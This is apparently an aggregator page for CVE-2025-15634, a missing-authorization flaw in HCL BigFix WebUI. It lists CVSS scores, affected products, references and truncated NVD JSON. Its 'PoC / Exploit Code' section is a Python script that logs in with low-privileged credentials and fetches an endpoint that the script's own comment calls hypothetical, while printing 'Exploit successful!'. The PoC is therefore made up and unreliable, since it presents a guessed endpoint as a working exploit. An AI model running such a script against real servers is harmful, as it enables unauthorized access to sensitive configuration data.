CVE-2025-15634

Description

A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:* - VULNERABLE

HCL BigFix WebUI (具体受影响版本请参考官方公告KB0130587)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
target_host = "https://bigfix-server.example.com"
login_endpoint = "/login"
# Hypothetical vulnerable endpoint based on description
vuln_endpoint = "/api/environment/config"

# Low-privileged user credentials
username = "test_user"
password = "test_password"

def exploit():
    session = requests.Session()
    
    # 1. Authenticate with low privileges
    print(f"[*] Logging in as low-priv user: {username}")
    login_payload = {
        "username": username,
        "password": password
    }
    
    try:
        login_resp = session.post(target_host + login_endpoint, data=login_payload, verify=False)
        if login_resp.status_code != 200:
            print("[-] Login failed.")
            return
        
        print("[+] Login successful.")
        
        # 2. Directly access the unauthorized sensitive page
        print(f"[*] Attempting to access sensitive info at: {vuln_endpoint}")
        exploit_resp = session.get(target_host + vuln_endpoint, verify=False)
        
        if exploit_resp.status_code == 200:
            print("[+] Exploit successful! Sensitive data retrieved:")
            print(exploit_resp.text)
        else:
            print(f"[-] Request failed with status code: {exploit_resp.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15634
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15634
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15634/
[4] VulDB https://vuldb.com/cve/CVE-2025-15634
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130587

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15634", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:09.130", "lastModified": "2026-05-14T20:28:14.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "33", "matchCriteriaId": "8680650F-B404-4812-AD8D-F93A7F52C20B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_application_administration:*:*:*:*:*:*:*:*", "versionEndExcluding": "40", "matchCriteriaId": "D8757E08-9B05-45FD-BEAC-7D27423C7FC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_cmep:*:*:*:*:*:*:*:*", "versionEndExcluding": "22", "matchCriteriaId": "DD60E500-25B7-42B4-8B0E-D84967B78AF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_common:*:*:*:*:*:*:*:*", "versionEndExcluding": "101", "matchCriteriaId": "E6441EA2-8CF7-4A3B-8AD8-BBE2A62E5DF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_content_app:*:*:*:*:*:*:*:*", "versionEndExcluding": "28", "matchCriteriaId": "CFE1EED8-C5C9-47CD-B20E-E5D113B4DF48"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_custom:*:*:*:*:*:*:*:*", "versionEndExcluding": "50", "matchCriteriaId": "92437F31-8DD7-4440-AF6A-02B5DDA55A3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_data_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "37", "matchCriteriaId": "9F3C0E3C-1CE1-43FC-9B4C-8D0EE77E3E10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_extensions:*:*:*:*:*:*:*:*", "versionEndExcluding": "14", "matchCriteriaId": "0F22F7CB-24CC-445F-87D9-CB0B4346401E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "35", "matchCriteriaId": "B7C2A16C-A840-47FF-9272-A17BD4CD7499"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_insights:*:*:*:*:*:*:*:*", "versionEndExcluding": "32", "matchCriteriaId": "97643BD1-2CE5-43A4-86C9-C25EE643E977"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_ivr:*:*:*:*:*:*:*:*", "versionEndExcluding": "23", "matchCriteriaId": "58DA2A15-7F8A-4D04-A158-18CBB803BF8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_mdm:*:*:*:*:*:*:*:*", "versionEndExcluding": "29", "matchCriteriaId": "A1287A97-8E7A-4B5F-BE14-2D871BD2E886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_webui_patch:*:*:*:*:*:*:*:*", "versionEndExcluding": "54", "matchCriteriaId": "5CA0410D-FC23-4F02 ... (truncated)